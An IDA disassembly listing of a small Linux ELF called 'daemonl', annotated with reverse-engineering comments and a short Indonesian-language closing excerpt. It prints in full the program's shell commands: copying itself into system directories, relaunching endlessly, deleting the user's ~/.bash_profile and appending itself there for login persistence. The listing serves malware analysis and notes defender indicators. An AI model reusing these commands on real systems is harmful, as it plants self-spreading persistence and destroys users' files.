.init:08048294 ;
.init:08048294 ; +-------------------------------------------------------------------------+
.init:08048294 ; |   This file is generated by The Interactive Disassembler (IDA)          |
.init:08048294 ; |   Copyright (c) 2010 by Hex-Rays SA,                                    |
.init:08048294 ; |   Licensed to: Freeware version                                         |
.init:08048294 ; +-------------------------------------------------------------------------+
.init:08048294 ;
.init:08048294 ; Input MD5 : BBB20B482900C062128F0894D881B286
.init:08048294
.init:08048294 ; File Name : Z:\media\r00t\daemonl
.init:08048294 ; Format : ELF (Executable)
.init:08048294 ; Interpreter '/lib/ld-linux.so.2'
.init:08048294 ; Needed Library 'libc.so.6'
.init:08048294 ;
.init:08048294 ; Source File : 'crtstuff.c'
.init:08048294 ; Source File : 'daemonl.c'
.init:08048294 ;
.init:08048294 ; Reader notes (review): 32-bit ELF, dynamically linked against libc only.
.init:08048294 ; Apart from startup glue the sole import is system() (see .plt / extern),
.init:08048294 ; so everything the program does is done through shell commands; the command
.init:08048294 ; strings live in .rodata and main() is the only user code (daemonl.c).
.init:08048294
.init:08048294 .686p
.init:08048294 .mmx
.init:08048294 .model flat
.init:08048294 .intel_syntax noprefix
.init:08048294
.init:08048294 ; ---------------------------------------------------------------------------
.init:08048294
.init:08048294 ; Segment type: Pure code
.init:08048294 ; Segment permissions: Read/Execute
.init:08048294 _init segment dword public 'CODE' use32
.init:08048294 assume cs:_init
.init:08048294 ;org 8048294h
.init:08048294 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.init:08048294
.init:08048294 ; =============== S U B R O U T I N E =======================================
.init:08048294
.init:08048294 ; Attributes: bp-based frame
.init:08048294
.init:08048294 ; _init (crtstuff.c): called from __libc_csu_init before main. Calls the weak
.init:08048294 ; __gmon_start__ if the loader resolved it, then the constructor glue
.init:08048294 ; (frame_dummy, __do_global_ctors_aux). No user code here.
.init:08048294 public _init_proc
.init:08048294 _init_proc proc near ; CODE XREF: __libc_csu_init+14 p
.init:08048294 push ebp ; _init
.init:08048295 mov ebp, esp
.init:08048297 push ebx
.init:08048298 sub esp, 4
.init:0804829B call $+5 ; i386 PIC idiom: push EIP ...
.init:080482A0 pop ebx ; ... ebx = 080482A0h
.init:080482A1 add ebx, 1D54h ; ebx = 08049FF4h = _GLOBAL_OFFSET_TABLE_
.init:080482A7 mov edx, [ebx-4] ; .got:08049FF0 = address of weak __gmon_start__ (0 when absent)
.init:080482AD test edx, edx
.init:080482AF jz short loc_80482B6
.init:080482B1 call ___gmon_start__ ; gprof hook, only when linked in
.init:080482B6
.init:080482B6 loc_80482B6: ; CODE XREF: _init_proc+1B j
.init:080482B6 call frame_dummy
.init:080482BB call __do_global_ctors_aux
.init:080482C0 pop eax
.init:080482C1 pop ebx
.init:080482C2 leave
.init:080482C3 retn
.init:080482C3 _init_proc endp
.init:080482C3
.init:080482C3 _init ends
.init:080482C3
.plt:080482C4 ; ---------------------------------------------------------------------------
.plt:080482C4
.plt:080482C4 ; Segment type: Pure code
.plt:080482C4 ; Segment permissions: Read/Execute
.plt:080482C4 ; Procedure linkage table. IDA collapsed the three 6-byte stubs; each jumps
.plt:080482C4 ; through its .got.plt slot (off_804A000 / off_804A004 / off_804A008, see the
.plt:080482C4 ; DATA XREFs there). Import list: __gmon_start__ (weak), system, __libc_start_main.
.plt:080482C4 _plt segment dword public 'CODE' use32
.plt:080482C4 assume cs:_plt
.plt:080482C4 ;org 80482C4h
.plt:080482C4 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.plt:080482C4 dd 4 dup(?) ; 16 bytes before the first stub; presumably PLT0 (resolver trampoline), shown as undefined data
.plt:080482D4 ; [00000006 BYTES: COLLAPSED FUNCTION ___gmon_start__. PRESS KEYPAD "+" TO EXPAND]
.plt:080482DA dw ?
.plt:080482DC dd 2 dup(?)
.plt:080482E4 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS KEYPAD "+" TO EXPAND]
.plt:080482EA dw ?
.plt:080482EC dd 2 dup(?)
.plt:080482F4 ; [00000006 BYTES: COLLAPSED FUNCTION ___libc_start_main. PRESS KEYPAD "+" TO EXPAND]
.plt:080482FA dw ?
.plt:080482FC dd 2 dup(?)
.plt:080482FC _plt ends
.plt:080482FC
.text:08048310 ; ---------------------------------------------------------------------------
.text:08048310
.text:08048310 ; Segment type: Pure code
.text:08048310 ; Segment permissions: Read/Execute
.text:08048310 _text segment para public 'CODE' use32
.text:08048310 assume cs:_text
.text:08048310 ;org 8048310h
.text:08048310 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:08048310
.text:08048310 ; =============== S U B R O U T I N E =======================================
.text:08048310
.text:08048310 ; glibc i386 process entry (crt1.o): hands argc/argv, the init/fini hooks and
.text:08048310 ; main to __libc_start_main, which does not return (hence the hlt below).
.text:08048310 public _start
.text:08048310 _start proc near
.text:08048310 xor ebp, ebp ; outermost-frame marker for unwinders
.text:08048312 pop esi ; esi = argc
.text:08048313 mov ecx, esp ; ecx = argv
.text:08048315 and esp, 0FFFFFFF0h ; 16-byte align the stack before the call
.text:08048318 push eax ; padding
.text:08048319 push esp ; stack_end
.text:0804831A push edx ; rtld_fini (handed over by the dynamic loader)
.text:0804831B push offset __libc_csu_fini
.text:08048320 push offset __libc_csu_init
.text:08048325 push ecx ; argv
.text:08048326 push esi ; argc
.text:08048327 push offset main
.text:0804832C call ___libc_start_main
.text:08048331 hlt ; not reached: __libc_start_main exits the process
.text:08048332 nop
.text:08048333 nop
.text:08048334 nop
.text:08048335 nop
.text:08048336 nop
.text:08048337 nop
.text:08048338 nop
.text:08048339 nop
.text:0804833A nop
.text:0804833B nop
.text:0804833C nop
.text:0804833D nop
.text:0804833E nop
.text:0804833F nop
.text:0804833F _start endp
.text:0804833F
.text:08048340
.text:08048340 ; =============== S U B R O U T I N E =======================================
.text:08048340
.text:08048340 ; Attributes: bp-based frame
.text:08048340
.text:08048340 ; crtstuff.c: run the destructors in __DTOR_LIST__ exactly once;
.text:08048340 ; completed_7065 guards against a second run, dtor_idx_7067 is the cursor.
.text:08048340 __do_global_dtors_aux proc near ; CODE XREF: _term_proc+13 p
.text:08048340 push ebp
.text:08048341 mov ebp, esp
.text:08048343 push ebx
.text:08048344 sub esp, 4
.text:08048347 cmp ds:completed_7065, 0 ; already ran? then nothing to do
.text:0804834E jnz short loc_804838F
.text:08048350 mov eax, ds:dtor_idx_7067 ; eax = index of the last destructor run
.text:08048355 mov ebx, offset __DTOR_END__
.text:0804835A sub ebx, offset __DTOR_LIST__
.text:08048360 sar ebx, 2
.text:08048363 sub ebx, 1 ; ebx = entry count without the sentinel
.text:08048366 cmp eax, ebx
.text:08048368 jnb short loc_8048388 ; unsigned: index >= count -> done
.text:0804836A lea esi, [esi+0] ; no-op, pads the loop head to a 16-byte boundary
.text:08048370
.text:08048370 loc_8048370: ; CODE XREF: __do_global_dtors_aux+46 j
.text:08048370 add eax, 1
.text:08048373 mov ds:dtor_idx_7067, eax ; cursor is stored before the call, so a nested run skips this entry
.text:08048378 call ds:__DTOR_LIST__[eax*4]
.text:0804837F mov eax, ds:dtor_idx_7067
.text:08048384 cmp eax, ebx
.text:08048386 jb short loc_8048370
.text:08048388
.text:08048388 loc_8048388: ; CODE XREF: __do_global_dtors_aux+28 j
.text:08048388 mov ds:completed_7065, 1
.text:0804838F
.text:0804838F loc_804838F: ; CODE XREF: __do_global_dtors_aux+E j
.text:0804838F add esp, 4
.text:08048392 pop ebx
.text:08048393 pop ebp
.text:08048394 retn
.text:08048394 __do_global_dtors_aux endp
.text:08048394
.text:08048394 ; ---------------------------------------------------------------------------
.text:08048395 align 10h
.text:080483A0
.text:080483A0 ; =============== S U B R O U T I N E =======================================
.text:080483A0
.text:080483A0 ; Attributes: bp-based frame
.text:080483A0
.text:080483A0 ; crtstuff.c: would register __JCR_LIST__ with _Jv_RegisterClasses. That weak
.text:080483A0 ; symbol appears to have linked as 0 (`mov eax, 0` below, and the extern segment
.text:080483A0 ; lists it as weak), so the `call eax` is never reached.
.text:080483A0 frame_dummy proc near ; CODE XREF: _init_proc:loc_80482B6 p
.text:080483A0
.text:080483A0 var_18 = dword ptr -18h
.text:080483A0
.text:080483A0 push ebp
.text:080483A1 mov ebp, esp
.text:080483A3 sub esp, 18h
.text:080483A6 mov eax, ds:__JCR_LIST__
.text:080483AB test eax, eax
.text:080483AD jz short locret_80483C1
.text:080483AF mov eax, 0 ; address of weak _Jv_RegisterClasses
.text:080483B4 test eax, eax
.text:080483B6 jz short locret_80483C1 ; always taken in this binary
.text:080483B8 mov [esp+18h+var_18], offset __JCR_LIST__
.text:080483BF call eax
.text:080483C1
.text:080483C1 locret_80483C1: ; CODE XREF: frame_dummy+D j
.text:080483C1 ; frame_dummy+16 j
.text:080483C1 leave
.text:080483C2 retn
.text:080483C2 frame_dummy endp
.text:080483C2
.text:080483C2 ; ---------------------------------------------------------------------------
.text:080483C3 align 4
.text:080483C4
.text:080483C4 ; =============== S U B R O U T I N E =======================================
.text:080483C4
.text:080483C4 ; Attributes: bp-based frame
.text:080483C4
.text:080483C4 ; int main(void) -- daemonl.c, the only user code in the binary.
.text:080483C4 ; Straight-line part: six system() calls copy the executable into /boot, /bin,
.text:080483C4 ; ~/, /etc/skel, /lib and /var/run and start each copy. Loop part (from
.text:080483C4 ; loc_8048415): start "daemonl" again via PATH, ~/, /lib and /boot, then delete
.text:080483C4 ; and recreate ~/.bash_profile with a "daemonl" line so every login shell
.text:080483C4 ; relaunches it. The closing `jmp short loc_8048415` is unconditional and there
.text:080483C4 ; is no return path, so main never exits. system()'s result (eax) is never
.text:080483C4 ; examined, so failed copies or launches go unnoticed. Because each started copy
.text:080483C4 ; runs this same endless loop, every system() that does launch one blocks on it
.text:080483C4 ; (nested, never-terminating processes; confirm dynamically).
.text:080483C4 ; Defender view: the artefacts are the paths in the .rodata strings, a "daemonl"
.text:080483C4 ; line in ~/.bash_profile, and an accumulating set of daemonl processes.
.text:080483C4 public main
.text:080483C4 main proc near ; DATA XREF: _start+17 o
.text:080483C4
.text:080483C4 var_10 = dword ptr -10h
.text:080483C4
.text:080483C4 push ebp
.text:080483C5 mov ebp, esp
.text:080483C7 and esp, 0FFFFFFF0h ; gcc main() prologue: 16-byte align the outgoing-argument area
.text:080483CA sub esp, 10h ; string
.text:080483CD mov [esp+10h+var_10], offset aCpDaemonlBoot ; "cp daemonl /boot/"
.text:080483D4 call _system
.text:080483D9 mov [esp+10h+var_10], offset aCpDaemonlBinSh ; "cp ~/daemonl /bin/; sh -c /bin/daemonl"
.text:080483E0 call _system
.text:080483E5 mov [esp+10h+var_10], offset aCpBinDaemonlSh ; "cp /bin/daemonl ~/; sh -c ~/daemonl"
.text:080483EC call _system
.text:080483F1 mov [esp+10h+var_10], offset aCpBinDaemonlEt ; "cp /bin/daemonl /etc/skel/; sh -c /etc/"...
.text:080483F8 call _system
.text:080483FD mov [esp+10h+var_10], offset aCpBinDaemonlLi ; "cp /bin/daemonl /lib/; sh -c /lib/daemo"...
.text:08048404 call _system
.text:08048409 mov [esp+10h+var_10], offset aCpBinDaemonlVa ; "cp /bin/daemonl /var/run/; sh -c /var/r"...
.text:08048410 call _system
.text:08048415
.text:08048415 loc_8048415: ; CODE XREF: main+99 j
.text:08048415 ; ---- endless loop: relaunch + profile persistence ----
.text:08048415 mov [esp+10h+var_10], offset aDaemonl ; "daemonl"
.text:0804841C call _system
.text:08048421 mov [esp+10h+var_10], offset aShCDaemonl ; "sh -c ~/daemonl"
.text:08048428 call _system
.text:0804842D mov [esp+10h+var_10], offset aShCLibDaemonl ; "sh -c /lib/daemonl"
.text:08048434 call _system
.text:08048439 mov [esp+10h+var_10], offset aShCBootDaemonl ; "sh -c /boot/daemonl"
.text:08048440 call _system
.text:08048445 mov [esp+10h+var_10], offset aRm_bash_profil ; "rm ~/.bash_profile"
.text:0804844C call _system
.text:08048451 mov [esp+10h+var_10], offset aEchoDaemonl_ba ; "echo daemonl>>~/.bash_profile"
.text:08048458 call _system
.text:0804845D jmp short loc_8048415 ; unconditional: no exit from main
.text:0804845D main endp
.text:0804845D
.text:0804845D ; ---------------------------------------------------------------------------
.text:0804845F align 10h
.text:08048460
.text:08048460 ; =============== S U B R O U T I N E =======================================
.text:08048460
.text:08048460 ; Attributes: bp-based frame
.text:08048460
.text:08048460 ; glibc csu: empty fini hook (prologue/epilogue only).
.text:08048460 public __libc_csu_fini
.text:08048460 __libc_csu_fini proc near ; DATA XREF: _start+B o
.text:08048460 push ebp
.text:08048461 mov ebp, esp
.text:08048463 pop ebp
.text:08048464 retn
.text:08048464 __libc_csu_fini endp
.text:08048464
.text:08048464 ; ---------------------------------------------------------------------------
.text:08048465 align 10h
.text:08048470
.text:08048470 ; =============== S U B R O U T I N E =======================================
.text:08048470
.text:08048470 ; Attributes: bp-based frame
.text:08048470
.text:08048470 ; void __libc_csu_init(int argc, char **argv, char **envp) -- glibc csu.
.text:08048470 ; Runs _init, then each function in the init array, forwarding the three
.text:08048470 ; arguments (arg_0/arg_4/arg_8). The array is empty in this binary, so in
.text:08048470 ; practice only _init runs.
.text:08048470 public __libc_csu_init
.text:08048470 __libc_csu_init proc near ; DATA XREF: _start+10 o
.text:08048470
.text:08048470 var_28 = dword ptr -28h
.text:08048470 var_24 = dword ptr -24h
.text:08048470 var_20 = dword ptr -20h
.text:08048470 arg_0 = dword ptr 8
.text:08048470 arg_4 = dword ptr 0Ch
.text:08048470
arg_8 = dword ptr 10h
.text:08048470
.text:08048470 push ebp
.text:08048471 mov ebp, esp
.text:08048473 push edi
.text:08048474 push esi
.text:08048475 push ebx
.text:08048476 call __i686_get_pc_thunk_bx ; ebx = 0804847Bh
.text:0804847B add ebx, 1B79h ; ebx = 08049FF4h = _GLOBAL_OFFSET_TABLE_
.text:08048481 sub esp, 1Ch
.text:08048484 call _init_proc
.text:08048489 lea edi, [ebx-0E0h] ; 08049F14h = __init_array_end (IDA names it __CTOR_LIST__)
.text:0804848F lea eax, [ebx-0E0h] ; same address as the array start: the init array is empty
.text:08048495 sub edi, eax
.text:08048497 sar edi, 2 ; edi = entry count = 0 here
.text:0804849A test edi, edi
.text:0804849C jz short loc_80484C2 ; taken: the loop below is dead in this binary
.text:0804849E xor esi, esi
.text:080484A0
.text:080484A0 loc_80484A0: ; CODE XREF: __libc_csu_init+50 j
.text:080484A0 mov eax, [ebp+arg_8]
.text:080484A3 mov [esp+28h+var_20], eax ; envp
.text:080484A7 mov eax, [ebp+arg_4]
.text:080484AA mov [esp+28h+var_24], eax ; argv
.text:080484AE mov eax, [ebp+arg_0]
.text:080484B1 mov [esp+28h+var_28], eax ; argc
.text:080484B4 call dword ptr [ebx+esi*4-0E0h] ; init_array[esi](argc, argv, envp)
.text:080484BB add esi, 1
.text:080484BE cmp esi, edi
.text:080484C0 jb short loc_80484A0
.text:080484C2
.text:080484C2 loc_80484C2: ; CODE XREF: __libc_csu_init+2C j
.text:080484C2 add esp, 1Ch
.text:080484C5 pop ebx
.text:080484C6 pop esi
.text:080484C7 pop edi
.text:080484C8 pop ebp
.text:080484C9 retn
.text:080484C9 __libc_csu_init endp
.text:080484C9
.text:080484CA
.text:080484CA ; =============== S U B R O U T I N E =======================================
.text:080484CA
.text:080484CA ; gcc i386 PIC helper: returns its own return address in ebx.
.text:080484CA public __i686_get_pc_thunk_bx
.text:080484CA __i686_get_pc_thunk_bx proc near ; CODE XREF: __libc_csu_init+6 p
.text:080484CA mov ebx, [esp+0]
.text:080484CD retn
.text:080484CD __i686_get_pc_thunk_bx endp
.text:080484CD
.text:080484CD ; ---------------------------------------------------------------------------
.text:080484CE align 10h
.text:080484D0
.text:080484D0 ; =============== S U B R O U T I N E =======================================
.text:080484D0
.text:080484D0 ; Attributes: bp-based frame
.text:080484D0
.text:080484D0 ; crtstuff.c: walk the constructor list backwards until the -1 sentinel.
.text:080484D0 ; __CTOR_LIST__ holds 0FFFFFFFFh in this binary (.ctors:08049F14), so the
.text:080484D0 ; first compare exits at once and no constructor runs.
.text:080484D0 __do_global_ctors_aux proc near ; CODE XREF: _init_proc+27 p
.text:080484D0 push ebp
.text:080484D1 mov ebp, esp
.text:080484D3 push ebx
.text:080484D4 sub esp, 4
.text:080484D7 mov eax, ds:__CTOR_LIST__
.text:080484DC cmp eax, 0FFFFFFFFh ; end-of-list sentinel
.text:080484DF jz short loc_80484F4
.text:080484E1 mov ebx, offset __CTOR_LIST__
.text:080484E6 db 66h ; 66 90 = two-byte nop, aligns the loop head
.text:080484E6 nop
.text:080484E8
.text:080484E8 loc_80484E8: ; CODE XREF: __do_global_ctors_aux+22 j
.text:080484E8 sub ebx, 4
.text:080484EB call eax ; ctor()
.text:080484ED mov eax, [ebx]
.text:080484EF cmp eax, 0FFFFFFFFh
.text:080484F2 jnz short loc_80484E8
.text:080484F4
.text:080484F4 loc_80484F4: ; CODE XREF: __do_global_ctors_aux+F j
.text:080484F4 add esp, 4
.text:080484F7 pop ebx
.text:080484F8 pop ebp
.text:080484F9 retn
.text:080484F9 __do_global_ctors_aux endp
.text:080484F9
.text:080484F9 ; ---------------------------------------------------------------------------
.text:080484FA align 4
.text:080484FA _text ends
.text:080484FA
.fini:080484FC ; ---------------------------------------------------------------------------
.fini:080484FC
.fini:080484FC ; Segment type: Pure code
.fini:080484FC ; Segment permissions: Read/Execute
.fini:080484FC _fini segment dword public 'CODE' use32
.fini:080484FC assume cs:_fini
.fini:080484FC ;org 80484FCh
.fini:080484FC assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.fini:080484FC
.fini:080484FC ; =============== S U B R O U T I N E =======================================
.fini:080484FC
.fini:080484FC ; Attributes: bp-based frame
.fini:080484FC
.fini:080484FC ; _fini: destructor glue, run on a normal process exit. main's endless loop
.fini:080484FC ; never exits on its own, so this is only reached if the process is ended
.fini:080484FC ; some other way that still runs exit handlers.
.fini:080484FC public _term_proc
.fini:080484FC _term_proc proc near
.fini:080484FC push ebp ; _fini
.fini:080484FD mov ebp, esp
.fini:080484FF push ebx
.fini:08048500 sub esp, 4
.fini:08048503 call $+5 ; PIC get-EIP idiom, as in _init_proc
.fini:08048508 pop ebx ; ebx = 08048508h
.fini:08048509 add ebx, 1AECh ; ebx = 08049FF4h = _GLOBAL_OFFSET_TABLE_
.fini:0804850F call __do_global_dtors_aux
.fini:08048514 pop ecx
.fini:08048515 pop ebx
.fini:08048516 leave
.fini:08048517 retn
.fini:08048517 _term_proc endp
.fini:08048517
.fini:08048517 _fini ends
.fini:08048517
.rodata:08048518 ;
; ---------------------------------------------------------------------------
.rodata:08048518
.rodata:08048518 ; Segment type: Pure data
.rodata:08048518 ; Segment permissions: Read
.rodata:08048518 ; Read-only data. The twelve strings below are the complete command set that
.rodata:08048518 ; main() hands to system(); system() runs them through `sh -c`, so `~` is
.rodata:08048518 ; expanded by the shell. Writing into /boot, /bin, /lib, /etc/skel and
.rodata:08048518 ; /var/run normally needs root; since main ignores system()'s return value,
.rodata:08048518 ; copies that fail are silent.
.rodata:08048518 _rodata segment dword public 'CONST' use32
.rodata:08048518 assume cs:_rodata
.rodata:08048518 ;org 8048518h
.rodata:08048518 public _fp_hw
.rodata:08048518 _fp_hw dd 3
.rodata:0804851C public _IO_stdin_used
.rodata:0804851C _IO_stdin_used dd 20001h
.rodata:08048520 aCpDaemonlBoot db 'cp daemonl /boot/',0 ; DATA XREF: main+9 o
.rodata:08048520 ; relative source path: only works when the cwd holds the binary
.rodata:08048532 align 4
.rodata:08048534 aCpDaemonlBinSh db 'cp ~/daemonl /bin/; sh -c /bin/daemonl',0
.rodata:08048534 ; DATA XREF: main+15 o
.rodata:0804855B align 4
.rodata:0804855C aCpBinDaemonlSh db 'cp /bin/daemonl ~/; sh -c ~/daemonl',0
.rodata:0804855C ; DATA XREF: main+21 o
.rodata:08048580 aCpBinDaemonlEt db 'cp /bin/daemonl /etc/skel/; sh -c /etc/skel/daemonl',0
.rodata:08048580 ; DATA XREF: main+2D o
.rodata:08048580 ; /etc/skel is the template copied into newly created home directories
.rodata:080485B4 aCpBinDaemonlLi db 'cp /bin/daemonl /lib/; sh -c /lib/daemonl',0
.rodata:080485B4 ; DATA XREF: main+39 o
.rodata:080485DE align 10h
.rodata:080485E0 aCpBinDaemonlVa db 'cp /bin/daemonl /var/run/; sh -c /var/run/daemonl',0
.rodata:080485E0 ; DATA XREF: main+45 o
.rodata:08048612 aDaemonl db 'daemonl',0 ; DATA XREF: main:loc_8048415 o
.rodata:08048612 ; bare name: resolved through the shell's PATH
.rodata:0804861A aShCDaemonl db 'sh -c ~/daemonl',0 ; DATA XREF: main+5D o
.rodata:0804862A aShCLibDaemonl db 'sh -c /lib/daemonl',0 ; DATA XREF: main+69 o
.rodata:0804863D aShCBootDaemonl db 'sh -c /boot/daemonl',0 ; DATA XREF: main+75 o
.rodata:08048651 aRm_bash_profil db 'rm ~/.bash_profile',0 ; DATA XREF: main+81 o
.rodata:08048651 ; the user's existing profile is deleted, not appended to
.rodata:08048664 aEchoDaemonl_ba db 'echo daemonl>>~/.bash_profile',0 ; DATA XREF: main+8D o
.rodata:08048664 ; login persistence: each login shell re-runs "daemonl"; this line is the cleanup indicator
.rodata:08048664 _rodata ends
.rodata:08048664
.eh_frame:08048684 ; ---------------------------------------------------------------------------
.eh_frame:08048684
.eh_frame:08048684 ; Segment type: Pure data
.eh_frame:08048684 ; Segment permissions: Read
.eh_frame:08048684 ; Empty unwind table (terminator only).
.eh_frame:08048684 _eh_frame segment dword public 'CONST' use32
.eh_frame:08048684 assume cs:_eh_frame
.eh_frame:08048684 ;org 8048684h
.eh_frame:08048684 __FRAME_END__ db 0
.eh_frame:08048685 db 0
.eh_frame:08048686 db 0
.eh_frame:08048687 db 0
.eh_frame:08048687 _eh_frame ends
.eh_frame:08048687
.ctors:08049F14 ; ---------------------------------------------------------------------------
.ctors:08049F14
.ctors:08049F14 ; Segment type: Pure data
.ctors:08049F14 ; Segment permissions: Read/Write
.ctors:08049F14 ; Constructor list: only the -1 sentinel, i.e. no global constructors.
.ctors:08049F14 _ctors segment dword public 'DATA' use32
.ctors:08049F14 assume cs:_ctors
.ctors:08049F14 ;org 8049F14h
.ctors:08049F14 __CTOR_LIST__ dd 0FFFFFFFFh ; DATA XREF: __do_global_ctors_aux+7 r
.ctors:08049F14 ; __do_global_ctors_aux+11 o
.ctors:08049F14 ; Alternative name is '__init_array_end'
.ctors:08049F18 __CTOR_END__ db 0
.ctors:08049F19 db 0
.ctors:08049F1A db 0
.ctors:08049F1B db 0
.ctors:08049F1B _ctors ends
.ctors:08049F1B
.dtors:08049F1C ; ---------------------------------------------------------------------------
.dtors:08049F1C
.dtors:08049F1C ; Segment type: Pure data
.dtors:08049F1C ; Segment permissions: Read/Write
.dtors:08049F1C ; Destructor list: sentinel only, so __do_global_dtors_aux has nothing to call.
.dtors:08049F1C _dtors segment dword public 'DATA' use32
.dtors:08049F1C assume cs:_dtors
.dtors:08049F1C ;org 8049F1Ch
.dtors:08049F1C __DTOR_LIST__ dd 0FFFFFFFFh ; DATA XREF: __do_global_dtors_aux+1A o
.dtors:08049F1C ; __do_global_dtors_aux+38 r
.dtors:08049F20 public __DTOR_END__
.dtors:08049F20 __DTOR_END__ db 0 ; DATA XREF: __do_global_dtors_aux+15 o
.dtors:08049F21 db 0
.dtors:08049F22 db 0
.dtors:08049F23 db 0
.dtors:08049F23 _dtors ends
.dtors:08049F23
.jcr:08049F24 ; ---------------------------------------------------------------------------
.jcr:08049F24
.jcr:08049F24 ; Segment type: Pure data
.jcr:08049F24 ; Segment permissions: Read/Write
.jcr:08049F24 ; Java class registration list (unused; read by frame_dummy, which takes the early exit).
.jcr:08049F24 _jcr segment dword public 'DATA' use32
.jcr:08049F24 assume cs:_jcr
.jcr:08049F24 ;org 8049F24h
.jcr:08049F24 __JCR_LIST__ dd 0 ; DATA XREF: frame_dummy+6 r
.jcr:08049F24 ; frame_dummy+18 o
.jcr:08049F24
_jcr ends
.jcr:08049F24
.got:08049FF0 ; ---------------------------------------------------------------------------
.got:08049FF0
.got:08049FF0 ; Segment type: Pure data
.got:08049FF0 ; Segment permissions: Read/Write
.got:08049FF0 ; Single GOT entry: the weak __gmon_start__ pointer tested by _init_proc ([ebx-4]).
.got:08049FF0 _got segment dword public 'DATA' use32
.got:08049FF0 assume cs:_got
.got:08049FF0 ;org 8049FF0h
.got:08049FF0 dd offset __gmon_start__
.got:08049FF0 _got ends
.got:08049FF0
.got.plt:08049FF4 ; ---------------------------------------------------------------------------
.got.plt:08049FF4
.got.plt:08049FF4 ; Segment type: Pure data
.got.plt:08049FF4 ; Segment permissions: Read/Write
.got.plt:08049FF4 ; PLT GOT. _GLOBAL_OFFSET_TABLE_ is the base all three PIC helpers compute
.got.plt:08049FF4 ; (08049FF4h); its first 12 bytes are conventionally the loader's own slots,
.got.plt:08049FF4 ; followed by one pointer per imported function.
.got.plt:08049FF4 _got_plt segment dword public 'DATA' use32
.got.plt:08049FF4 assume cs:_got_plt
.got.plt:08049FF4 ;org 8049FF4h
.got.plt:08049FF4 _GLOBAL_OFFSET_TABLE_ db ? ;
.got.plt:08049FF5 db ? ;
.got.plt:08049FF6 db ? ;
.got.plt:08049FF7 db ? ;
.got.plt:08049FF8 db ? ;
.got.plt:08049FF9 db ? ;
.got.plt:08049FFA db ? ;
.got.plt:08049FFB db ? ;
.got.plt:08049FFC db ? ;
.got.plt:08049FFD db ? ;
.got.plt:08049FFE db ? ;
.got.plt:08049FFF db ? ;
.got.plt:0804A000 off_804A000 dd offset __gmon_start__ ; DATA XREF: ___gmon_start__ r
.got.plt:0804A004 off_804A004 dd offset system ; DATA XREF: _system r
.got.plt:0804A004 ; the one import main uses
.got.plt:0804A008 off_804A008 dd offset __libc_start_main
.got.plt:0804A008 ; DATA XREF: ___libc_start_main r
.got.plt:0804A008 _got_plt ends
.got.plt:0804A008
.data:0804A00C ; ---------------------------------------------------------------------------
.data:0804A00C
.data:0804A00C ; Segment type: Pure data
.data:0804A00C ; Segment permissions: Read/Write
.data:0804A00C ; No program-specific initialised data; only the usual crt markers.
.data:0804A00C _data segment dword public 'DATA' use32
.data:0804A00C assume cs:_data
.data:0804A00C ;org 804A00Ch
.data:0804A00C public data_start ; weak
.data:0804A00C data_start db 0 ; Alternative name is '__data_start'
.data:0804A00D db 0
.data:0804A00E db 0
.data:0804A00F db 0
.data:0804A010 public __dso_handle
.data:0804A010 __dso_handle db 0
.data:0804A011 db 0
.data:0804A012 db 0
.data:0804A013 db 0
.data:0804A013 _data ends
.data:0804A013
.bss:0804A014 ; ---------------------------------------------------------------------------
.bss:0804A014
.bss:0804A014 ; Segment type: Uninitialized
.bss:0804A014 ; Segment permissions: Read/Write
.bss:0804A014 ; Only the crtstuff bookkeeping for __do_global_dtors_aux lives here.
.bss:0804A014 _bss segment dword public 'BSS' use32
.bss:0804A014 assume cs:_bss
.bss:0804A014 ;org 804A014h
.bss:0804A014 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.bss:0804A014 completed_7065 db ? ; DATA XREF: __do_global_dtors_aux+7 r
.bss:0804A014 ; __do_global_dtors_aux:loc_8048388 w
.bss:0804A014 ; run-once flag for the destructor walk
.bss:0804A015 align 4
.bss:0804A018 dtor_idx_7067 dd ? ; DATA XREF: __do_global_dtors_aux+10 r
.bss:0804A018 ; __do_global_dtors_aux+33 w ...
.bss:0804A018 _bss ends .bss:0804A018 extern:804A01C ; --------------------------------------------------------------------------- extern:804A01C extern:804A01C ; Segment type: Externs extern:804A01C ; extern extern:804A01C extrn system@@GLIBC_2_0:near extern:804A020 extrn __libc_start_main@@GLIBC_2_0:near extern:804A024 ; int system(const char *string) extern:804A024 extrn system:near ; DATA XREF: .got.plt:off_804A004 o extern:804A028 extrn __libc_start_main:near extern:804A028 ; DATA XREF: .got.plt:off_804A008 o extern:804A02C extrn __gmon_start__ ; weak ; DATA XREF: .got:08049FF0 o extern:804A02C ; .got.plt:off_804A000 o extern:804A030 extrn _Jv_RegisterClasses ; weak extern:804A030 abs:804A130 ; --------------------------------------------------------------------------- abs:804A130 abs:804A130 ; Segment type: Absolute symbols abs:804A130 ; abs abs:804A130 public __bss_start abs:804A130 __bss_start = 804A014h abs:804A134 public _end abs:804A134 _end = 804A01Ch abs:804A138 public _edata abs:804A138 _edata = 804A014h abs:804A138 abs:804A138 abs:804A138 end _start =========================================================================================================== perhatikan strings ini : .text:080483C4 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ .text:080483C4 .text:080483C4 ; Attributes: bp-based frame .text:080483C4 .text:080483C4 public main .text:080483C4 main proc near ; DATA XREF: _start+17 o .text:080483C4 .text:080483C4 var_10 = dword ptr -10h .text:080483C4 .text:080483C4 push ebp .text:080483C5 mov ebp, esp .text:080483C7 and esp, 0FFFFFFF0h .text:080483CA sub esp, 10h ; string .text:080483CD mov [esp+10h+var_10], offset aCpDaemonlBoot ; "cp daemonl /boot/" .text:080483D4 call _system .text:080483D9 mov [esp+10h+var_10], offset aCpDaemonlBinSh ; "cp ~/daemonl /bin/; sh -c /bin/daemonl" .text:080483E0 call _system .text:080483E5 mov [esp+10h+var_10], offset aCpBinDaemonlSh ; "cp /bin/daemonl ~/; sh -c ~/daemonl" 
